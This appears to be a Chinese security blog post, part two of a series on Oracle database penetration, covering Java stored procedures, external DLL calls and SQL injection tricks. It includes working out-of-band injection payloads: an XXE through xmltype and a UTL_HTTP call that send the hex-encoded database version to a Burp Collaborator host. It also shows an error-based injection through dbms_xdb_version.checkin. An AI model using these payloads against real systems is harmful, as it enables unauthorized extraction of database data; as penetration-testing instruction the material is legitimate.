STATEMENT
声明
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,雷神众测及文章作者不为此承担任何责任。
雷神众测拥有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经雷神众测允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。
👇点击阅读第一章内容
Oracle 渗透利用(一)主要介绍了Oracle的体系结构,这一章我们将介绍Oracle Java支持、Oracle CLR和Oracle SQL 注入技巧。
Oracle Java支持
在Oracle 8i之后,Oracle增加了对Java语言的支持,所以提供了Java池(可选,一个内存区域),用于存放Java代码、Java语句的语法分析表、Java语句的执行方案和Java虚拟机中的数据,以便进行Java程序开发。
既可以使用SQL语句从java源代码创建存储过程,也可以利用外部的class文件(java源代码文件、jar包)创建(既可以在SQL语句中加载,也可使用loadjava)。
drop java class "ExploitDecode"
要加引号,并且不能直接删除类,需要把引用它的内容先删除,这点与sql server的clr很相似
查看所有JAVA类
select * from DBA_JAVA_CLASSES
select * from USER_JAVA_CLASSES
select * from ALL_JAVA_CLASSES
Oracle CLR
通过PL/SQL调用外部的DLL来实现的存储过程
Oracle SQL 注入技巧
Oracle双引号通常被当做普通字符
进行注入测试时,通常只考虑单引号即可
但是可以用来包裹字段名
Oracle注释符是-- 和/*
单行注释
多行注释,需要闭合
Oracle字符串连接符是||
oracle带外注入
oralce9i开始我们对oracle数据库进行攻击的时候通常需要确定数据库的版本,以便确定是否能进行进一步的利用,这里举一个带外查询数据库版本的例子,因为域名中不能出现特殊字符,所以需要进行编码,经过测试一个子域名最长是64个字节(猜测与dns服务器的具体实现有关,后边再看dns服务器具体实现对dns查询请求A记录名称长度的规定),但是select BANNER from v$version where rownum=1返回的第一条信息编码后的长度远超过64个字节,可以看出第三行数据比较短,但是oracle没有limit语句,就很不方便。
我们可以用这条语句达到同样的效果,因为我们只需要获取到版本即可
SELECT VERSION FROM PRODUCT_COMPONENT_VERSION where ROWNUM=1
SELECT extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://'||(SELECT rawtohex(VERSION) FROM PRODUCT_COMPONENT_VERSION where ROWNUM=1)||'.fl4oiu2as1pycr4g77lqjsk8yz4pse.burpcollaborator.net/"> %remote;]>'),'/l') FROM dual
进行其他操作同样需要考虑以上问题
也可以使用UTL_HTTP
select * from t_user where name='admin' || utl_http.request('http://'||(SELECT RAWTOHEX(VERSION) FROM PRODUCT_COMPONENT_VERSION where ROWNUM=1)||'.ujh1wgf4gp9zr79ra4270zdt7kda1z.burpcollaborator.net')
使用Oracle专属函数判断是否为Oracle数据库
to_char、to_number
支持科学计数法
使用instr替代like
instr函数,返回参数二在参数一中第一次出现的位置(从1开始)
报错注入
select * from t_user where name='admin' || dbms_xdb_version.checkin(user)
本章主要介绍了Oracle Java支持、Oracle CLR和Oracle SQL 注入技巧,下一章我们将介绍Oracle命令执行技巧和Oracle其他利用。
👇点击阅读第一章内容
RECRUITMENT
招聘启事
END
长按识别二维码关注我们
原文始发于微信公众号(白帽子):Oracle 渗透利用(二)
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论